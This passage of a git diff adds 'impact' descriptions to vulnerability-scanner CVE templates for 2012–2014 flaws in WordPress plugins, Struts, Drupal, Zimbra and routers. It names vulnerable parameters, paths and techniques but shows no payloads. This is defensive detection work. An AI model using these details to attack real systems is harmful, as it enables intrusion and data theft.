ReturnUrl to Default.aspx + impact: | + An attacker can trick users into visiting a malicious website, leading to potential phishing attacks or further exploitation. remediation: | Upgrade to WebsitePanel v1.2.2.1 or later to fix the open redirect vulnerability. reference: diff --git a/http/cves/2012/CVE-2012-4242.yaml b/http/cves/2012/CVE-2012-4242.yaml index 915797b17b..6623548d0b 100644 --- a/http/cves/2012/CVE-2012-4242.yaml +++ b/http/cves/2012/CVE-2012-4242.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A cross-site scripting vulnerability in the MF Gig Calendar plugin 0.9.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the query string to the calendar page. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the website, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update to the latest version of the WordPress Plugin MF Gig Calendar to mitigate this vulnerability. reference: diff --git a/http/cves/2012/CVE-2012-4253.yaml b/http/cves/2012/CVE-2012-4253.yaml index 8a6ed1bde7..27121fd1e6 100644 --- a/http/cves/2012/CVE-2012-4253.yaml +++ b/http/cves/2012/CVE-2012-4253.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: Multiple directory traversal vulnerabilities in MySQLDumper 1.24.4 allow remote attackers to read arbitrary files via a .. (dot dot) in the (1) language parameter to learn/cubemail/install.php or (2) f parameter learn/cubemail/filemanagement.php, or execute arbitrary local files via a .. (dot dot) in the (3) config parameter to learn/cubemail/menu.php. + impact: | + An attacker can read sensitive files on the server, potentially leading to unauthorized access or information disclosure. remediation: | Upgrade to a patched version of MySQLDumper or apply the necessary security patches to fix the directory traversal vulnerability. reference: diff --git a/http/cves/2012/CVE-2012-4273.yaml b/http/cves/2012/CVE-2012-4273.yaml index d3e8795149..4e77433ac3 100644 --- a/http/cves/2012/CVE-2012-4273.yaml +++ b/http/cves/2012/CVE-2012-4273.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A cross-site scripting vulnerability in libs/xing.php in the 2 Click Social Media Buttons plugin before 0.34 for WordPress allows remote attackers to inject arbitrary web script or HTML via the xing-url parameter. + impact: | + Allows attackers to inject malicious scripts into web pages viewed by users, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update to the latest version of the 2 Click Socialmedia Buttons plugin (0.34 or higher) to fix the XSS vulnerability. reference: diff --git a/http/cves/2012/CVE-2012-4547.yaml b/http/cves/2012/CVE-2012-4547.yaml index 783b071d71..3242abfcaf 100644 --- a/http/cves/2012/CVE-2012-4547.yaml +++ b/http/cves/2012/CVE-2012-4547.yaml @@ -5,6 +5,8 @@ info: author: dhiyaneshDk severity: medium description: AWStats is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. + impact: | + Allows remote attackers to inject arbitrary web script or HTML via the 'url' parameter. reference: - https://www.exploit-db.com/exploits/36164 - https://nvd.nist.gov/vuln/detail/CVE-2012-4547 diff --git a/http/cves/2012/CVE-2012-4768.yaml b/http/cves/2012/CVE-2012-4768.yaml index f54715f549..a9c99aeeb2 100644 --- a/http/cves/2012/CVE-2012-4768.yaml +++ b/http/cves/2012/CVE-2012-4768.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A cross-site scripting vulnerability in the Download Monitor plugin before 3.3.5.9 for WordPress allows remote attackers to inject arbitrary web script or HTML via the dlsearch parameter to the default URI. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update to the latest version of Download Monitor (3.3.5.9 or higher) or apply the official patch provided by the plugin developer. reference: diff --git a/http/cves/2012/CVE-2012-4878.yaml b/http/cves/2012/CVE-2012-4878.yaml index bdae8173e9..2cda1b38e7 100644 --- a/http/cves/2012/CVE-2012-4878.yaml +++ b/http/cves/2012/CVE-2012-4878.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A path traversal vulnerability in controlcenter.php in FlatnuX CMS 2011 08.09.2 allows remote administrators to read arbitrary files via a full pathname in the dir parameter in a contents/Files action. + impact: | + An attacker can read or modify sensitive files on the server, potentially leading to unauthorized accessand data leakage. remediation: | Apply the latest security patches or updates provided by the vendor to fix the directory traversal vulnerability in FlatnuX CMS. reference: diff --git a/http/cves/2012/CVE-2012-4889.yaml b/http/cves/2012/CVE-2012-4889.yaml index 99d165329b..d641f31877 100644 --- a/http/cves/2012/CVE-2012-4889.yaml +++ b/http/cves/2012/CVE-2012-4889.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: Multiple cross-site scripting vulnerabilities in ManageEngine Firewall Analyzer 7.2 allow remote attackers to inject arbitrary web script or HTML via the (1) subTab or (2) tab parameter to createAnomaly.do; (3) url, (4) subTab, or (5) tab parameter to mindex.do; (6) tab parameter to index2.do; or (7) port parameter to syslogViewer.do. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected user's browser. remediation: | Apply the latest security patch or upgrade to a newer version of ManageEngine Firewall Analyzer. reference: diff --git a/http/cves/2012/CVE-2012-4940.yaml b/http/cves/2012/CVE-2012-4940.yaml index 721f35973b..b531f9bd96 100644 --- a/http/cves/2012/CVE-2012-4940.yaml +++ b/http/cves/2012/CVE-2012-4940.yaml @@ -5,6 +5,8 @@ info: author: dhiyaneshDk severity: medium description: Multiple directory traversal vulnerabilities in the View Log Files component in Axigen Free Mail Server allow remote attackers to read or delete arbitrary files via a .. (dot dot) in the fileName parameter in a download action to source/loggin/page_log_dwn_file.hsp, or the fileName parameter in an edit or delete action to the default URI. + impact: | + An attacker can read sensitive files, potentially leading to unauthorized access, data leakage, or further compromise of the server. remediation: | Apply the latest security patches or updates provided by the vendor to fix the directory traversal vulnerability in Axigen Mail Server. reference: diff --git a/http/cves/2012/CVE-2012-4982.yaml b/http/cves/2012/CVE-2012-4982.yaml index ce0a2a0c76..10c4a71d87 100644 --- a/http/cves/2012/CVE-2012-4982.yaml +++ b/http/cves/2012/CVE-2012-4982.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Open redirect vulnerability in assets/login on the Forescout CounterACT NAC device before 7.0 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the 'a' parameter. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the download of malware. remediation: | Apply the latest security patches or upgrade to a newer version of Forescout CounterACT to fix the open redirect vulnerability. reference: diff --git a/http/cves/2012/CVE-2012-5321.yaml b/http/cves/2012/CVE-2012-5321.yaml index dd0a23a854..3fcf10e078 100644 --- a/http/cves/2012/CVE-2012-5321.yaml +++ b/http/cves/2012/CVE-2012-5321.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | tiki-featured_link.php in TikiWiki CMS/Groupware 8.3 allows remote attackers to load arbitrary web site pages into frames and conduct phishing attacks via the url parameter, aka "frame injection + impact: | + Successful exploitation of this vulnerability could lead to phishing attacks and potential unauthorized access to sensitive information. remediation: | Apply the latest security patches or upgrade to a newer version of TikiWiki CMS Groupware to mitigate the risk of open redirect vulnerabilities. reference: diff --git a/http/cves/2012/CVE-2012-5913.yaml b/http/cves/2012/CVE-2012-5913.yaml index 016edb6791..3ead5b8d07 100644 --- a/http/cves/2012/CVE-2012-5913.yaml +++ b/http/cves/2012/CVE-2012-5913.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A cross-site scripting vulnerability in wp-integrator.php in the WordPress Integrator module 1.32 for WordPress allows remote attackers to inject arbitrary web script or HTML via the redirect_to parameter to wp-login.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions. remediation: | Update the WordPress Integrator plugin to the latest version or apply the vendor-supplied patch to mitigate this vulnerability. reference: diff --git a/http/cves/2012/CVE-2012-6499.yaml b/http/cves/2012/CVE-2012-6499.yaml index af0a0420f5..180c58b2e4 100644 --- a/http/cves/2012/CVE-2012-6499.yaml +++ b/http/cves/2012/CVE-2012-6499.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Open redirect vulnerability in age-verification.php in the Age Verification plugin 0.4 and earlier for WordPress allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the redirect_to parameter. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the installation of malware. remediation: | Update to the latest version of the WordPress Plugin Age Verification or remove the plugin if not needed. reference: diff --git a/http/cves/2013/CVE-2013-1965.yaml b/http/cves/2013/CVE-2013-1965.yaml index 439b8a9903..57bce42903 100644 --- a/http/cves/2013/CVE-2013-1965.yaml +++ b/http/cves/2013/CVE-2013-1965.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: critical description: Apache Struts Showcase App 2.0.0 through 2.3.13, as used in Struts 2 before 2.3.14.3, allows remote attackers to execute arbitrary OGNL code via a crafted parameter name that is not properly handled when invoking a redirect. + impact: | + Successful exploitation of this vulnerability can lead to remote code execution on the affected server. remediation: Developers should immediately upgrade to Struts 2.3.14.3 or later. reference: - http://struts.apache.org/development/2.x/docs/s2-012.html diff --git a/http/cves/2013/CVE-2013-2248.yaml b/http/cves/2013/CVE-2013-2248.yaml index 781bcf578a..58d51dfc1d 100644 --- a/http/cves/2013/CVE-2013-2248.yaml +++ b/http/cves/2013/CVE-2013-2248.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: medium description: Apache Struts is prone to multiple open-redirection vulnerabilities because the application fails to properly sanitize user-supplied input. + impact: | + An attacker can exploit these vulnerabilities to redirect users to malicious websites, leading to phishing attacks or the download of malware. remediation: Developers should immediately upgrade to Struts 2.3.15.1 or later. reference: - https://www.exploit-db.com/exploits/38666 diff --git a/http/cves/2013/CVE-2013-2251.yaml b/http/cves/2013/CVE-2013-2251.yaml index c41c320328..989e20b00a 100644 --- a/http/cves/2013/CVE-2013-2251.yaml +++ b/http/cves/2013/CVE-2013-2251.yaml @@ -5,6 +5,8 @@ info: author: exploitation,dwisiswant0,alex severity: critical description: In Struts 2 before 2.3.15.1 the information following "action:", "redirect:", or "redirectAction:" is not properly sanitized and will be evaluated as an OGNL expression against the value stack. This introduces the possibility to inject server side code. + impact: | + This vulnerability can lead to remote code execution, allowing attackers to take control of the affected system. remediation: Developers should immediately upgrade to Struts 2.3.15.1 or later. reference: - http://struts.apache.org/release/2.3.x/docs/s2-016.html diff --git a/http/cves/2013/CVE-2013-2287.yaml b/http/cves/2013/CVE-2013-2287.yaml index 5084c52336..06373c1701 100644 --- a/http/cves/2013/CVE-2013-2287.yaml +++ b/http/cves/2013/CVE-2013-2287.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: Multiple cross-site scripting vulnerabilities in views/notify.php in the Uploader plugin 1.0.4 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) notify or (2) blog parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement. remediation: | Update to the latest version of the WordPress Plugin Uploader or apply a patch provided by the vendor to fix the XSS vulnerability. reference: diff --git a/http/cves/2013/CVE-2013-2621.yaml b/http/cves/2013/CVE-2013-2621.yaml index 58a18da05f..e4221fae05 100644 --- a/http/cves/2013/CVE-2013-2621.yaml +++ b/http/cves/2013/CVE-2013-2621.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Open Redirection Vulnerability in the redir.php script in Telaen before 1.3.1 allows remote attackers to redirect victims to arbitrary websites via a crafted URL. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the installation of malware. remediation: | Upgrade to the latest version of Telaen to fix the open redirect vulnerability. reference: diff --git a/http/cves/2013/CVE-2013-3526.yaml b/http/cves/2013/CVE-2013-3526.yaml index 1703425ab4..3879a0231c 100644 --- a/http/cves/2013/CVE-2013-3526.yaml +++ b/http/cves/2013/CVE-2013-3526.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A cross-site scripting vulnerability in js/ta_loaded.js.php in the Traffic Analyzer plugin, possibly 3.3.2 and earlier, for WordPress allows remote attackers to inject arbitrary web script or HTML via the aoid parameter." + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential theft of sensitive information or unauthorized actions. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2013/CVE-2013-4117.yaml b/http/cves/2013/CVE-2013-4117.yaml index 296cc84781..c4dd7108c7 100644 --- a/http/cves/2013/CVE-2013-4117.yaml +++ b/http/cves/2013/CVE-2013-4117.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A cross-site scripting vulnerability in includes/CatGridPost.php in the Category Grid View Gallery plugin 2.3.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the ID parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the website, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update to the latest version of the WordPress Plugin Category Grid View Gallery or apply the provided patch to fix the XSS vulnerability. reference: diff --git a/http/cves/2013/CVE-2013-4625.yaml b/http/cves/2013/CVE-2013-4625.yaml index 77e759b62a..9c4eb8d59b 100644 --- a/http/cves/2013/CVE-2013-4625.yaml +++ b/http/cves/2013/CVE-2013-4625.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A cross-site scripting vulnerability in files/installer.cleanup.php in the Duplicator plugin before 0.4.5 for WordPress allows remote attackers to inject arbitrary web script or HTML via the package parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the target website, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: Upgrade to Duplicator 0.4.5 or later. reference: - https://nvd.nist.gov/vuln/detail/CVE-2013-4625 diff --git a/http/cves/2013/CVE-2013-5528.yaml b/http/cves/2013/CVE-2013-5528.yaml index bb216b2fc9..7963f2a804 100644 --- a/http/cves/2013/CVE-2013-5528.yaml +++ b/http/cves/2013/CVE-2013-5528.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the Tomcat administrative web interface in Cisco Unified Communications Manager allows remote authenticated users to read arbitrary files via directory traversal sequences in an unspecified input string, aka Bug ID CSCui78815 + impact: | + Successful exploitation of this vulnerability could allow an attacker to access sensitive files and directories on the affected system. remediation: | Apply the necessary security patches or updates provided by Cisco to mitigate this vulnerability. reference: diff --git a/http/cves/2013/CVE-2013-5979.yaml b/http/cves/2013/CVE-2013-5979.yaml index 734c242e92..b311b91712 100644 --- a/http/cves/2013/CVE-2013-5979.yaml +++ b/http/cves/2013/CVE-2013-5979.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in Spring Signage Xibo 1.2.x before 1.2.3 and 1.4.x before 1.4.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the p parameter to index.php. + impact: | + An attacker can read arbitrary files on the server. remediation: | Upgrade to a patched version of Xibo. reference: diff --git a/http/cves/2013/CVE-2013-6281.yaml b/http/cves/2013/CVE-2013-6281.yaml index b736bf450b..c68ab62911 100644 --- a/http/cves/2013/CVE-2013-6281.yaml +++ b/http/cves/2013/CVE-2013-6281.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Spreadsheet plugin contains a reflected cross-site scripting vulnerability in /dhtmlxspreadsheet/codebase/spreadsheet.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected WordPress site, leading to potential data theft, session hijacking, or defacement. remediation: | Update the WordPress Spreadsheet plugin to the latest version, which includes proper input sanitization to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2013/CVE-2013-7091.yaml b/http/cves/2013/CVE-2013-7091.yaml index 4378843f5e..33319391d9 100644 --- a/http/cves/2013/CVE-2013-7091.yaml +++ b/http/cves/2013/CVE-2013-7091.yaml @@ -5,6 +5,8 @@ info: author: rubina119 severity: medium description: A directory traversal vulnerability in /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz in Zimbra 7.2.2 and 8.0.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the skin parameter. This can be leveraged to execute arbitrary code by obtaining LDAP credentials and accessing the service/admin/soap API. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, potentially leading to unauthorized access or information disclosure. remediation: | Apply the latest security patches or upgrade to a newer version of Zimbra Collaboration Server to mitigate the LFI vulnerability. reference: diff --git a/http/cves/2013/CVE-2013-7240.yaml b/http/cves/2013/CVE-2013-7240.yaml index fdc08b7c1c..59c571c2c0 100644 --- a/http/cves/2013/CVE-2013-7240.yaml +++ b/http/cves/2013/CVE-2013-7240.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in download-file.php in the Advanced Dewplayer plugin 1.2 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the dew_file parameter. + impact: | + An attacker can exploit this vulnerability to access sensitive files, potentially leading to unauthorized disclosure of sensitive information. remediation: | Update to the latest version of the Advanced Dewplayer plugin or remove it if it is not actively used. reference: diff --git a/http/cves/2013/CVE-2013-7285.yaml b/http/cves/2013/CVE-2013-7285.yaml index 8fd790c066..544d4df6a4 100644 --- a/http/cves/2013/CVE-2013-7285.yaml +++ b/http/cves/2013/CVE-2013-7285.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Xstream API before 1.4.6 and 1.4.10 is susceptible to remote code execution. If the security framework has not been initialized, an attacker can run arbitrary shell commands by manipulating the processed input stream when unmarshaling XML or any supported format. This can allow an attacker to obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system. remediation: | Upgrade XStream to version 1.4.10 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2014/CVE-2014-10037.yaml b/http/cves/2014/CVE-2014-10037.yaml index 633a147679..b60c3e123b 100644 --- a/http/cves/2014/CVE-2014-10037.yaml +++ b/http/cves/2014/CVE-2014-10037.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in DomPHP 0.83 and earlier allows remote attackers to have unspecified impacts via a .. (dot dot) in the url parameter to photoalbum/index.php. + impact: | + An attacker can read, modify, or delete sensitive files on the server, potentially leading to unauthorized access or data leakage. remediation: | Upgrade to a patched version of DomPHP or apply the necessary security patches to fix the directory traversal vulnerability. reference: diff --git a/http/cves/2014/CVE-2014-1203.yaml b/http/cves/2014/CVE-2014-1203.yaml index 781ab8ce15..a1bc2f9207 100644 --- a/http/cves/2014/CVE-2014-1203.yaml +++ b/http/cves/2014/CVE-2014-1203.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: critical description: Eyou Mail System before 3.6 allows remote attackers to execute arbitrary commands via shell metacharacters in the domain parameter to admin/domain/ip_login_set/d_ip_login_get.php via the get_login_ip_config_file function. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Upgrade to a patched version of Eyou E-Mail <3.6 or apply the necessary security patches. reference: diff --git a/http/cves/2014/CVE-2014-2321.yaml b/http/cves/2014/CVE-2014-2321.yaml index a5822163de..0a3e85e171 100644 --- a/http/cves/2014/CVE-2014-2321.yaml +++ b/http/cves/2014/CVE-2014-2321.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | ZTE F460 and F660 cable modems allows remote attackers to obtain administrative access via sendcmd requests to web_shell_cmd.gch, as demonstrated by using "set TelnetCfg" commands to enable a TELNET service with specified credentials. + impact: | + Remote code execution remediation: | Apply the latest firmware update provided by ZTE to fix the vulnerability reference: diff --git a/http/cves/2014/CVE-2014-2323.yaml b/http/cves/2014/CVE-2014-2323.yaml index 0bc851ac31..e1cffbd630 100644 --- a/http/cves/2014/CVE-2014-2323.yaml +++ b/http/cves/2014/CVE-2014-2323.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: critical description: A SQL injection vulnerability in mod_mysql_vhost.c in lighttpd before 1.4.35 allows remote attackers to execute arbitrary SQL commands via the host name (related to request_check_hostname). + impact: | + Successful exploitation of these vulnerabilities could lead to unauthorized access to sensitive data and remote code execution remediation: | Upgrade to a patched version of Lighttpd or apply the necessary security patches reference: diff --git a/http/cves/2014/CVE-2014-2383.yaml b/http/cves/2014/CVE-2014-2383.yaml index cfde8c0f73..9d4d1c1837 100644 --- a/http/cves/2014/CVE-2014-2383.yaml +++ b/http/cves/2014/CVE-2014-2383.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | A vulnerability in dompdf.php in dompdf before 0.6.1, when DOMPDF_ENABLE_PHP is enabled, allows context-dependent attackers to bypass chroot protections and read arbitrary files via a PHP protocol and wrappers in the input_file parameter, as demonstrated by a php://filter/read=convert.base64-encode/resource in the input_file parameter. + impact: | + The vulnerability can lead to unauthorized access to sensitive files, remote code execution, and compromise of the affected system. remediation: | Upgrade Dompdf to a version higher than v0.6.0 to mitigate the vulnerability. reference: diff --git a/http/cves/2014/CVE-2014-2908.yaml b/http/cves/2014/CVE-2014-2908.yaml index 9e6c00a923..5fc5aae042 100644 --- a/http/cves/2014/CVE-2014-2908.yaml +++ b/http/cves/2014/CVE-2014-2908.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A cross-site scripting vulnerability in the integrated web server on Siemens SIMATIC S7-1200 CPU devices 2.x and 3.x allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected user's browser. remediation: Upgrade to v4.0 or later. reference: - https://www.exploit-db.com/exploits/44687 diff --git a/http/cves/2014/CVE-2014-2962.yaml b/http/cves/2014/CVE-2014-2962.yaml index 4cb30ccc8f..2a41db0bcd 100644 --- a/http/cves/2014/CVE-2014-2962.yaml +++ b/http/cves/2014/CVE-2014-2962.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A path traversal vulnerability in the webproc cgi module on the Belkin N150 F9K1009 v1 router with firmware before 1.00.08 allows remote attackers to read arbitrary files via a full pathname in the getpage parameter. + impact: | + An attacker can exploit this vulnerability to view sensitive files, potentially leading to unauthorized access, data leakage, or further compromise of the system. remediation: Ensure that appropriate firewall rules are in place to restrict access to port 80/tcp from external untrusted sources. reference: - https://www.kb.cert.org/vuls/id/774788 diff --git a/http/cves/2014/CVE-2014-3120.yaml b/http/cves/2014/CVE-2014-3120.yaml index 298e21947b..97ebff1ed2 100644 --- a/http/cves/2014/CVE-2014-3120.yaml +++ b/http/cves/2014/CVE-2014-3120.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | The default configuration in Elasticsearch before 1.2 enables dynamic scripting, which allows remote attackers to execute arbitrary MVEL expressions and Java code via the source parameter to _search. Be aware this only violates the vendor's intended security policy if the user does not run Elasticsearch in its own independent virtual machine. + impact: | + Allows remote attackers to execute arbitrary code on the affected system remediation: | Upgrade to a patched version of ElasticSearch reference: diff --git a/http/cves/2014/CVE-2014-3206.yaml b/http/cves/2014/CVE-2014-3206.yaml index 09e2e4550f..8683dd9192 100644 --- a/http/cves/2014/CVE-2014-3206.yaml +++ b/http/cves/2014/CVE-2014-3206.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: critical description: Seagate BlackArmor NAS allows remote attackers to execute arbitrary code via the session parameter to localhost/backupmgt/localJob.php or the auth_name parameter to localhost/backupmgmt/pre_connect_check.php. + impact: | + Successful exploitation of this vulnerability allows an attacker to execute arbitrary commands with the privileges of the affected device, potentially leading to unauthorized access, data loss, or further compromise of the network. remediation: | Apply the latest firmware update provided by Seagate to patch the command injection vulnerability. reference: diff --git a/http/cves/2014/CVE-2014-3704.yaml b/http/cves/2014/CVE-2014-3704.yaml index ae1be6b91c..a81fa00f9f 100644 --- a/http/cves/2014/CVE-2014-3704.yaml +++ b/http/cves/2014/CVE-2014-3704.yaml @@ -5,6 +5,8 @@ info: author: princechaddha severity: high description: The expandArguments function in the database abstraction API in Drupal core 7.x before 7.32 does not properly construct prepared statements, which allows remote attackers to conduct SQL injection attacks via an array containing specially crafted keys. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the Drupal application and its underlying database. remediation: Upgrade to Drupal core 7.32 or later. reference: - https://www.drupal.org/forum/newsletters/security-advisories-for-drupal-core/2014-10-15/sa-core-2014-005-drupal-core-sql diff --git a/http/cves/2014/CVE-2014-3744.yaml b/http/cves/2014/CVE-2014-3744.yaml index f8682b9864..425e614e34 100644 --- a/http/cves/2014/CVE-2014-3744.yaml +++ b/http/cves/2014/CVE-2014-3744.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: high description: A directory traversal vulnerability in the st module before 0.2.5 for Node.js allows remote attackers to read arbitrary files via a %2e%2e (encoded dot dot) in an unspecified path. + impact: | + An attacker can read sensitive files on the server, potentially leading to unauthorized access or exposure of sensitive information. remediation: | Upgrade to a patched version of the st module or use an alternative module that is not vulnerable to directory traversal. reference: diff --git a/http/cves/2014/CVE-2014-4210.yaml b/http/cves/2014/CVE-2014-4210.yaml index ed1cc09291..170304b95f 100644 --- a/http/cves/2014/CVE-2014-4210.yaml +++ b/http/cves/2014/CVE-2014-4210.yaml @@ -5,6 +5,8 @@ info: author: princechaddha severity: medium description: An unspecified vulnerability in the Oracle WebLogic Server component in Oracle Fusion Middleware 10.0.2.0 and 10.3.6.0 allows remote attackers to affect confidentiality via vectors related to WLS - Web Services. + impact: | + Successful exploitation of this vulnerability could allow an attacker to bypass network restrictions and access internal resources. remediation: | Apply the latest patches and updates provided by Oracle to fix the SSRF vulnerability reference: diff --git a/http/cves/2014/CVE-2014-4513.yaml b/http/cves/2014/CVE-2014-4513.yaml index bd377386a4..1e067c3be7 100644 --- a/http/cves/2014/CVE-2014-4513.yaml +++ b/http/cves/2014/CVE-2014-4513.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: Multiple cross-site scripting vulnerabilities in server/offline.php in the ActiveHelper LiveHelp Live Chat plugin 3.1.0 and earlier for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) MESSAGE, (2) EMAIL, or (3) NAME parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions. remediation: | Upgrade to a patched version of ActiveHelper LiveHelp Server or apply the necessary security patches to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2014/CVE-2014-4535.yaml b/http/cves/2014/CVE-2014-4535.yaml index 8f2d0fe455..2bb0b95dd3 100644 --- a/http/cves/2014/CVE-2014-4535.yaml +++ b/http/cves/2014/CVE-2014-4535.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A cross-site scripting vulnerability in the Import Legacy Media plugin 0.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the filename parameter to getid3/demos/demo.mimeonly.php. + impact: | + Successful exploitation of this vulnerability could lead to the execution of arbitrary script code in the context of the affected website, potentially allowing an attacker to steal sensitive information or perform unauthorized actions. remediation: | Update to the latest version of the Import Legacy Media plugin (0.1 or higher) to mitigate this vulnerability. reference: diff --git a/http/cves/2014/CVE-2014-4536.yaml b/http/cves/2014/CVE-2014-4536.yaml index 58b5bfde91..02455d1c92 100644 --- a/http/cves/2014/CVE-2014-4536.yaml +++ b/http/cves/2014/CVE-2014-4536.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: Multiple cross-site scripting vulnerabilities in tests/notAuto_test_ContactService_pauseCampaign.php in the Infusionsoft Gravity Forms plugin before 1.5.6 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) go, (2) contactId, or (3) campaignId parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. remediation: | Upgrade Infusionsoft Gravity Forms Add-on to version 1.5.7 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2014/CVE-2014-4539.yaml b/http/cves/2014/CVE-2014-4539.yaml index 4dc93cd1e0..7696c096dd 100644 --- a/http/cves/2014/CVE-2014-4539.yaml +++ b/http/cves/2014/CVE-2014-4539.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A cross-site scripting vulnerability in the Movies plugin 0.6 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the filename parameter to getid3/demos/demo.mimeonly.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to a patched version of the Movies plugin (version 0.7 or above) that addresses the XSS vulnerability. reference: diff --git a/http/cves/2014/CVE-2014-4544.yaml b/http/cves/2014/CVE-2014-4544.yaml index d367d7a6ce..b59fd07b87 100644 --- a/http/cves/2014/CVE-2014-4544.yaml +++ b/http/cves/2014/CVE-2014-4544.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: The Podcast Channels WordPress plugin was affected by an unauthenticated reflected cross-site scripting security vulnerability. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected website, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update to the latest version of the Podcast Channels plugin (0.28 or higher) to fix this vulnerability. reference: diff --git a/http/cves/2014/CVE-2014-4550.yaml b/http/cves/2014/CVE-2014-4550.yaml index 50c9d3dacb..51490ad8d3 100644 --- a/http/cves/2014/CVE-2014-4550.yaml +++ b/http/cves/2014/CVE-2014-4550.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A cross-site scripting vulnerability in preview-shortcode-external.php in the Shortcode Ninja plugin 1.4 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the shortcode parameter. + impact: | + Allows remote attackers to inject arbitrary web script or 